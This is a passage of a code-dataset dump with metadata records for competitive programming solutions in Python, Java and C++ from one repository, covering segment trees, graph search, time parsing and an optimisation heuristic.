'/' + p2) if not p1.endswith('/') else (p1 + p2)\n\nr = []\np = []\nsz = 0\n\ndef dfs(root, path):\n global r\n global p\n global sz\n for i in range(len(root)):\n k = root[i]\n if 'ok' in k and k['type'] == 'Folder' and k['size'] > 0 and sz + k['size'] <= bs:\n sz += k['size']\n cur = getPath(path, k['path'])\n if not k['ok']:\n p.append(cur)\n r.append(k)\n dfs(k['children'], cur)\n\nwhile True:\n dfs(root, '/')\n if len(r) == 0:\n break\n read = post({'paths': p})\n for i in range(len(read)):\n r[i]['ok'] = True\n r[i]['children'] = list(map(lambda x: {'ok': False, 'children': [], 'path': x['name'], 'type': x['type'], 'size': x['size']}, read[i]))\n\n p = []\n r = []\n sz = 0\n\ns = []\ndef dfs2(root, path):\n global s\n for i in range(len(root)):\n k = root[i]\n cur = getPath(path, k['path'])\n s.append(cur)\n if 'ok' in k and k['type'] == 'Folder' and k['size'] > 0:\n dfs2(k['children'], cur)\ndfs2(root, '/')\n\nprint(len(s))\nprint(*sorted(s), sep = '\\n')\n" }, { "alpha_fraction": 0.5525786876678467, "alphanum_fraction": 0.5659745335578918, "avg_line_length": 18.389610290527344, "blob_id": "9da3d5d3539a8db194534c5fbaafa801287dced4", "content_id": "3037b387891b453d502c841b248696441cc183e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 65, "num_lines": 77, "path": "/2013/2013yandex/C.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\n\npublic class C {\n\n\tint findd(String a, int k, char c) {\n\t\tfor (int i = k; i < 8; i++)\n\t\t\tif (a.charAt(i) == c)\n\t\t\t\treturn i;\n\t\treturn -1;\n\t}\n\n\tvoid run() throws IOException {\n\t\tString a = next();\n\t\tString s = \"0000\";\n\t\tint k = 0, prev = 0;\n\t\tfor (int i = 0; i < 4; i++) {\n\t\t\twhile (findd(a, k, s.charAt(i)) == -1) {\n\t\t\t\tchar c = s.charAt(i);\n\t\t\t\tc++;\n\t\t\t\ts = s.substring(0, i) + c + s.substring(i + 1);\n\t\t\t}\n\n\t\t\tprev = k;\n\t\t\tk = findd(a, k, s.charAt(i)) + 1;\n\t\t\tif (8 - k + 1 < 4 - i) {\n\t\t\t\tchar c = s.charAt(i);\n\t\t\t\tc++;\n\t\t\t\ts = s.substring(0, i) + c + s.substring(i-- + 1);\n\t\t\t\tk = prev;\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t}\t\tSystem.out.print(s);\n\n\t\tpw.println(s);\n\t}\n\n\tint[] na(int a_len) throws IOException {\n\t\tint[] _a = new int[a_len];\n\t\tfor (int i = 0; i < a_len; i++)\n\t\t\t_a[i] = ni();\n\t\treturn _a;\n\t}\n\n\tString next() throws IOException {\n\t\twhile (st == null || !st.hasMoreTokens())\n\t\t\tst = new StringTokenizer(br.readLine());\n\t\treturn st.nextToken();\n\t}\n\n\tint ni() throws IOException {\n\t\treturn Integer.parseInt(next());\n\t}\n\n\tlong nextLong() throws IOException {\n\t\treturn Long.parseLong(next());\n\t}\n\n\tString nl() throws IOException {\n\t\treturn br.readLine();\n\t}\n\n\tstatic PrintWriter pw;\n\tstatic BufferedReader br;\n\tstatic StringTokenizer st;\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tpw = new PrintWriter(\"number.out\");\n\t\tbr = new BufferedReader(new FileReader(new File(\"number.in\")));\n\n\t\tnew C().run();\n\n\t\tbr.close();\n\t\tpw.close();\n\t}\n\n}\n" }, { "alpha_fraction": 0.5197802186012268, "alphanum_fraction": 0.5538461804389954, "avg_line_length": 25.735294342041016, "blob_id": "e4dffaaa0b0f021ee0cf23235410f1e7c3de9879", "content_id": "01be706460f0c58f41affd8dd6bc087f0c0335aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 910, "license_type": "no_license", "max_line_length": 60, "num_lines": 34, "path": "/2023/tin/4.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import json\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\nf = '%Y-%m-%d'\nnow = datetime.strptime('2023-04-15', f)\ndd = datetime.fromisoformat('2013-01-03T12:00:00.000+03:00')\n\ndef filter_data(text: str) -> str:\n j = json.loads(text)\n ret = []\n for x in j:\n if not 'admin' in x['roles']:\n continue\n dob = datetime.strptime(x['profile']['dob'], f)\n difference = relativedelta(now, dob).years\n if difference < 35:\n continue\n created = datetime.fromisoformat(x['createdAt'])\n if created < dd:\n continue\n\n ret.append({\n \"username\": x['username'],\n \"email\": x['email'],\n \"name\": x['profile']['name'],\n \"age\": difference,\n })\n return json.dumps(ret)\n\n\nif __name__ == \"__main__\":\n input_str = input()\n print(filter_data(input_str))\n\n" }, { "alpha_fraction": 0.49127259850502014, "alphanum_fraction": 0.5061885118484497, "avg_line_length": 27.260089874267578, "blob_id": "3bffeaa8a1303545eec8a3579ade240ad94b793f", "content_id": "7ca98fd0fb66dfe1c24cfb3c3a75a75f542c00a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6302, "license_type": "no_license", "max_line_length": 165, "num_lines": 223, "path": "/CodeForce/0522/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//Igorjan94, template version from 16 February 2015\n#include <bits/stdc++.h>\n/*\n#include <ext/rope>\n#include <ext/pb_ds/assoc_container.hpp>\n#include <ext/pb_ds/tree_policy.hpp>\n\nusing namespace __gnu_cxx;\nusing namespace __gnu_pbds;\ntypedef tree<int, int/null_type, less<int>, rb_tree_tag, tree_order_statistics_node_update> orderedMap;\n*/\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define fst first\n#define snd second\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define eb emplace_back\n#define vs vector<string>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int>>\n#define pll pair<long long, long long>\n#define elohw(a) a.rbegin(), a.rend()\n#define whole(a) a.begin(), a.end()\n#define next _next\n#define prev _prev\n\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n#define wr(args...) err(split(#args,',').begin(),args)\n\n#define FILENAME \"input\"\n#define INF 1000000007\n\n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n#define ints(args...) int args; readln(args)\n#define lls(args...) ll args; readln(args)\n#define vints(args...) vi args; readln(args)\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n typedef function<T (T, T)> F;\n F f;\n T NEITRAL_ELEMENT;\n\n void build(vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n t[v] = a[l];\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n t[v] = f(t[v * 2], t[v * 2 + 1]);\n }\n };\n\n segmentTree(vector<T>& a, F g)\n {\n n = a.size();\n t.resize(n * 4);\n f = g;\n if (f(2, 4) == 6)\n NEITRAL_ELEMENT = 0;\n else\n if (f(-2, 10) == -2)\n NEITRAL_ELEMENT = numeric_limits<T>::max();\n build(a, 1, 0, n - 1);\n }\n\n T get(int l, int r)\n {\n return get(1, 0, n - 1, l, r);\n }\n\n T get(int v, int tl, int tr, int l, int r) \n {\n if (l > r)\n return NEITRAL_ELEMENT;\n if (l == tl && r == tr)\n return t[v];\n int tm = (tl + tr) / 2;\n return f(get(v * 2, tl, tm, l, min(r, tm)), get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r));\n }\n\n void update(int position, int value)\n {\n update(1, 0, n - 1, position, value);\n }\n\n void update(int v, int tl, int tr, int position, int value) \n {\n if (tl == tr)\n t[v] = value;\n else \n {\n int tm = (tl + tr) / 2;\n if (position <= tm)\n update(v * 2, tl, tm, position, value);\n else\n update(v * 2 + 1, tm + 1, tr, position, value);\n t[v] = f(t[v * 2], t[v * 2 + 1]);\n }\n }\n};\n\nvoid run()\n{\n ints(n, m);\n vi a(n), next(n), prev(n);\n readln(a);\n map<int, int> mp;\n int t;\n fori(n)\n if (mp.find(a[i]) == mp.end())\n mp[a[i]] = i,\n next[i] = INF,\n prev[i] = INF;\n else\n t = mp[a[i]],\n prev[i] = i - t,\n next[t] = i,\n mp[a[i]] = i,\n next[i] = INF;\n segmentTree<int> tree(prev, [](int x, int y){return min(x, y);});\n vector<pair<pii, int>> query(m);\n vi ans(m);\n int x, y;\n fori(m)\n readln(x, y),\n query[i] = {{x - 1, y - 1}, i};\n sort(whole(query));\n int j = 0, i = 0;\n while (j < m)\n {\n pii q = query[j].first;\n for (; i < q.first; ++i)\n if (next[i] < n)\n tree.update(next[i], INF);\n ans[query[j++].second] = tree.get(q.first, q.second);\n }\n transform(whole(ans), ans.begin(), [](int x){return x == INF ? -1 : x;});\n writeln(ans);\n}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.3711340129375458, "alphanum_fraction": 0.40979382395744324, "avg_line_length": 16.590909957885742, "blob_id": "043a7817c9efbf22feae954bd148568cd2526b99", "content_id": "d79b32b03b3358b493d01063726c2904b7e95e48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 30, "num_lines": 22, "path": "/CodeForce/1543/interactor.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import random\nimport sys\n\nn = 100\nx = random.randint(0, n - 1)\nt = 100\nprint(t)\nfor i in range(t):\n print(n, 2)\n steps = 0\n while True:\n steps += 1\n y = int(input())\n if x == y:\n print(1)\n if steps > n:\n sys.exit(10)\n break\n else:\n x ^= y\n print(0)\n sys.stdout.flush()\n\n" }, { "alpha_fraction": 0.3045842945575714, "alphanum_fraction": 0.3442113399505615, "avg_line_length": 18.815383911132812, "blob_id": "f9ae8d7270b7a5cd11fa5fc72005799a819b7adb", "content_id": "6e76e3b4839f6af639747bf5ac70ca1097a3348a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1287, "license_type": "no_license", "max_line_length": 54, "num_lines": 65, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n#include <set>\n \nusing namespace std;\n \n \nint a[500000], t[1000000];\n \n \nvoid run()\n{\n int w, h, n, x;\n cin >> h >> w >> n;\n h = min (h, n);\n int two = 2;\n while (two < h)\n two *= 2;\n for (int i = 0; i < h; ++i){\n a[i] = w;\n }\n for (int i = h; i < two; ++i)\n a[i] = 0;\n for (int i = two - 1; i < two * 2 - 1; ++i)\n t[i] = a[i - two + 1];\n \n for (int i = two - 2; i >= 0; --i)\n t[i] = max(t[2 * i + 1], t[2 * i + 2]);\n \n for (int i = 0; i < n; ++i){\n cin >> x;\n int rq = 0;\n if (t[rq] < x){\n cout << -1 << endl;\n continue;\n }\n while (rq < two - 1){\n int to = 2 * rq + 2;\n if (t[2 * rq + 1] >= x)\n to = 2 * rq + 1;\n rq = to;\n // cout << rq << endl;\n }\n t[rq] -= x;\n cout << rq - two + 2 << endl;\n rq = (rq - 1) / 2;\n while (rq){\n t[rq] = max(t[2 * rq + 1], t[2 * rq + 2]);\n rq = (rq - 1) / 2;\n }\n t[rq] = max(t[2 * rq + 1], t[2 * rq + 2]);\n \n \n }\n \n}\n \nint main()\n{\n freopen(\"billboard.in\", \"r\", stdin);\n freopen(\"billboard.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.4060150384902954, "alphanum_fraction": 0.4368816912174225, "avg_line_length": 35.62318801879883, "blob_id": "b0a43d9212c8a0365f403a2872b0de169eddbfcb", "content_id": "5fbe6773e76e066cf6085166232f900eea0c3bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2527, "license_type": "no_license", "max_line_length": 928, "num_lines": 69, "path": "/2013/2013RCC3/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nint n, m;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n// freopen(\"input.txt\", \"r\", stdin);\n int t;\n readln(t);\n for (int tt = 0; tt < t; tt++)\n {\n char c, d;\n int start = 0, finish = 0;\n scanf(\"%c%c\", &c, &d);\n start += 60 * 60 * ((c - '0') * 10 + d - '0');\n scanf(\":\");\n scanf(\"%c%c\", &c, &d);\n start += 60 * ((c - '0') * 10 + d - '0');\n scanf(\":\");\n scanf(\"%c%c\", &c, &d);\n start += ((c - '0') * 10 + d - '0');\n scanf(\" \");\n scanf(\"%c%c\", &c, &d);\n finish += 60 * 60 * ((c - '0') * 10 + d - '0');\n scanf(\":\");\n scanf(\"%c%c\", &c, &d);\n finish += 60 * ((c - '0') * 10 + d - '0');\n scanf(\":\");\n scanf(\"%c%c\", &c, &d);\n finish += ((c - '0') * 10 + d - '0');\n readln(m);\n m *= 60;\n int time = (finish - start + 24 * 60 * 60) % (24 * 60 * 60);\n if (time == 0)\n time = 60 * 60 * 24;\n if (time >= m)\n printf(\"Perfect\\n\"); else\n if (time >= m - 60 * 60)\n printf(\"Test\\n\"); else\n printf(\"Fail\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.45735475420951843, "alphanum_fraction": 0.46876487135887146, "avg_line_length": 31.66149139404297, "blob_id": "0aec60d85d1ae44614b1994f0cefbc3ea7c05ba9", "content_id": "d64b1994078145b1215ac5d0a53551cdb8e04160", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10517, "license_type": "no_license", "max_line_length": 155, "num_lines": 322, "path": "/2018/yaopt/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (#define -> typedef, readln(vector) patched, version from 27 March 2017)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\n\nstruct site\n{\n vector<int> themes;\n vector<int> sites;\n int t;\n int p;\n\n site(){}\n};\n\nistream& operator>>(istream& is, site& s)\n{\n ints(q);\n s.themes.resize(q);\n for (auto& x : s.themes)\n is >> x, --x;\n is >> s.t >> s.p;\n ints(o);\n s.sites.resize(o);\n for (auto& x : s.sites)\n is >> x, --x;\n return is;\n}\n\n#define COUNT_OF_USED 2\n\n\nvoid run()\n{\n srand(clock());\n double time = clock();\n ints(n, k, r, t, s);\n vector<site> sites(n);\n vector<int> freq(k);\n vector<vi> dp(n);\n readln(sites, freq);\n vector<vi> sitesWithTopic(k);\n fori(n)\n for (auto& topic: sites[i].themes)\n sitesWithTopic[topic].pb(i);\n\n fori(n)\n {\n dp[i].resize(n, INF);\n dp[i][i] = 0;\n queue<int> q;\n q.push(i);\n while (q.size())\n {\n int u = q.front();\n q.pop();\n for (int& v : sites[u].sites)\n if (dp[i][v] == INF)\n dp[i][v] = dp[i][u] + 1,\n q.push(v);\n }\n }\n //writeln(dp);\n vector<vector<int>> ans;\n double answer = 0.0;\n int CCC = 1;\n int WWW = 0;\n\n auto F = [](int x) -> int {\n if (x < 50)\n return x * 3;\n return pow(x, 2.0 / 5) + 10;\n };\n\n\n\n\n std::vector<std::pair<int, int>> newsGeneration;\n std::vector<std::pair<int, int>> newsEvents;\n std::vector<std::list<int>> newsOnSite2(n);\n for (int topic = 0; topic < k; topic++)\n for (int curTime = 0; curTime <= t; curTime += freq[topic])\n newsGeneration.emplace_back(curTime, topic);\n sort(newsGeneration.begin(), newsGeneration.end());\n auto itG = newsGeneration.begin();\n for (int curTime = 0; curTime <= t; curTime++)\n for (; itG != newsGeneration.end() && itG->first == curTime; itG++)\n {\n const int topic = itG->second;\n bool newsAppeared = false;\n newsEvents.emplace_back(topic, curTime);\n while (!newsAppeared)\n {\n for (int ss : sitesWithTopic[topic])\n if (rand() % 99 + 1 <= sites[ss].p)\n {\n newsOnSite2[ss].push_back(newsEvents.size() - 1);\n newsAppeared = true;\n }\n }\n }\n\n\n\n\n while ((clock() - time) / CLOCKS_PER_SEC < 1.8)\n {\n CCC++;\n set<int> starts;\n while (int(starts.size()) < r)\n starts.insert(rand() % n);\n int countVertices;\n vector<vector<int>> paths(r);\n int i = 0;\n int coeff = F(CCC);\n //rand() % (4 * r) + 10;\n vector<bool> used(n);\n\n auto dfs = [&](auto& f, int start, int u) -> void\n {\n used[u] = true;\n paths[i].pb(u);\n countVertices++;\n int mn = INF;\n int legit = -1;\n if (rand() % 7 == 0)\n {\n vector<pii> good, best;\n for (auto v : sites[u].sites)\n {\n int temp = dp[v][start];\n if (temp && temp + countVertices <= min(coeff, n))\n (used[v] ? good : best).pb({temp, v});\n else if (temp + countVertices <= n && mn > temp)\n mn = temp,\n legit = v;\n }\n sort(good.begin(), good.end());\n sort(best.begin(), best.end());\n int index = -1;\n int sz = best.size();\n int df = sz - 1;\n while (df > 0 && best[df].first == best.back().first) --df;\n int sz2 = good.size();\n int df2 = sz2 - 1;\n while (df2 > 0 && good[df2].first == good.back().first) --df2;\n\n if (sz)\n index = best[df + rand() % (sz - df)].second;\n if (index == -1 && sz2)\n index = good[df2 + rand() % (sz2 - df2)].second;\n if (index != -1)\n f(f, start, index);\n else if (legit != -1 && dp[legit][start])\n f(f, start, legit);\n } else {\n vector<pii> good;\n for (auto v : sites[u].sites)\n {\n int temp = dp[v][start];\n if (temp && temp + countVertices <= min(coeff, n))\n good.pb({temp, v});\n else if (temp + countVertices <= n && mn > temp)\n mn = temp,\n legit = v;\n }\n sort(good.begin(), good.end());\n int sz = good.size();\n //int j = sz - 1;\n //while (j >= 1 && good[j].first == good.back().first)\n //--j;\n int df = 9 + rand() % 3;\n if (sz)\n f(f, start, good[sz >= df ? (sz - df + rand() % df) : sz - 1].second);\n else if (legit != -1 && dp[legit][start])\n f(f, start, legit);\n }\n };\n\n for (auto& u : starts)\n {\n countVertices = 0;\n forj(n) used[j] = false;\n dfs(dfs, u, u);\n ++i;\n }\n \n\n\n std::vector<std::pair<int, int>> indexFinishes;\n forj(r)\n {\n int curTime = 0;\n size_t nextSiteIndex = 0;\n while (true) {\n const int nextSite = paths[j][nextSiteIndex];\n const int finishTime = curTime + sites[nextSite].t;\n if (finishTime > t) break;\n indexFinishes.emplace_back(finishTime, nextSite);\n curTime = finishTime;\n nextSiteIndex = (nextSiteIndex + 1) % paths[j].size();\n }\n }\n\n sort(indexFinishes.begin(), indexFinishes.end());\n\n auto itF = indexFinishes.begin();\n std::vector<std::pair<int, int>> events(newsEvents);\n std::vector<std::list<int>> newsOnSite(newsOnSite2);;\n double score = 0;\n for (int curTime = 0; curTime <= t; curTime++) {\n for (; itF != indexFinishes.end() && itF->first == curTime; itF++) {\n const int site = itF->second;\n const int indexBeginTime = curTime - sites[site].t;\n auto& newsVector = newsOnSite[site];\n while (!newsVector.empty()) {\n const int ev = newsVector.front();\n if (events[ev].second <= indexBeginTime) {\n if (events[ev].first != -1) {\n score += std::max(0, s * freq[events[ev].first] - (curTime - events[ev].second));\n events[ev].first = -1;\n }\n newsVector.pop_front();\n } else {\n break;\n }\n }\n }\n }\n\n score = score / s / k / t;\n if (score >= answer)\n answer = score, \n WWW = coeff,\n ans = paths;\n\n //cerr << CCC << \"\\n\";\n //cerr << coeff << \"\\n\";\n //cerr << score << \"\\n\";\n //cerr << \"\\n\";\n //break;\n }\n for (auto& x : ans)\n {\n for (auto& y : x) ++y;\n writeln(x.size(), x);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4507042169570923, "alphanum_fraction": 0.4828973710536957, "avg_line_length": 18.115385055541992, "blob_id": "da60518ce4d9209b9f4c00e2aa41a3dd85bb8e63", "content_id": "735f1a72cbbe87088075e0c06c0c517e6d66764b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 48, "num_lines": 26, "path": "/CodeForce/gym/101090/L.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nn = int(input())\nstrings = input().split()\nr = []\nb = []\nfor s in strings:\n color = s[-1]\n s = int(s[:-1])\n r.append(s) if color == 'R' else b.append(s)\n\nif len(r) == 0 or len(b) == 0:\n print(0)\n sys.exit()\n\ndef part(a):\n a[0] = (a[0], a[0])\n for i in range(1, len(a)):\n a[i] = (a[i], a[i - 1][1] + a[i])\n return a\n\nr = part(list(reversed(sorted(r))))\nb = part(list(reversed(sorted(b))))\n\nl = min(len(r), len(b))\nprint(r[l - 1][1] + b[l - 1][1] - l * 2)\n" }, { "alpha_fraction": 0.5057851076126099, "alphanum_fraction": 0.5355371832847595, "avg_line_length": 25.88888931274414, "blob_id": "1916a73e65d94a2a1d099281e74193022227e4dc", "content_id": "3c0a8f0f3c91490be323df084671221e776fa687", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1210, "license_type": "no_license", "max_line_length": 123, "num_lines": 45, "path": "/atcoder/abc162/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <map>\n#include <numeric>\n#include <iomanip>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n string s;\n cin >> s;\n cout << (s[0] == '7' || s[1] == '7' || s[2] == '7' ? \"Yes\" : \"No\") << endl;\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.41336116194725037, "alphanum_fraction": 0.4613778591156006, "avg_line_length": 20.44776153564453, "blob_id": "9db0b7d3abaaa0fe172acd5711bb014035778cd1", "content_id": "4993210e5bf89492adf6ebf4f913237ef795a8e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1437, "license_type": "no_license", "max_line_length": 64, "num_lines": 67, "path": 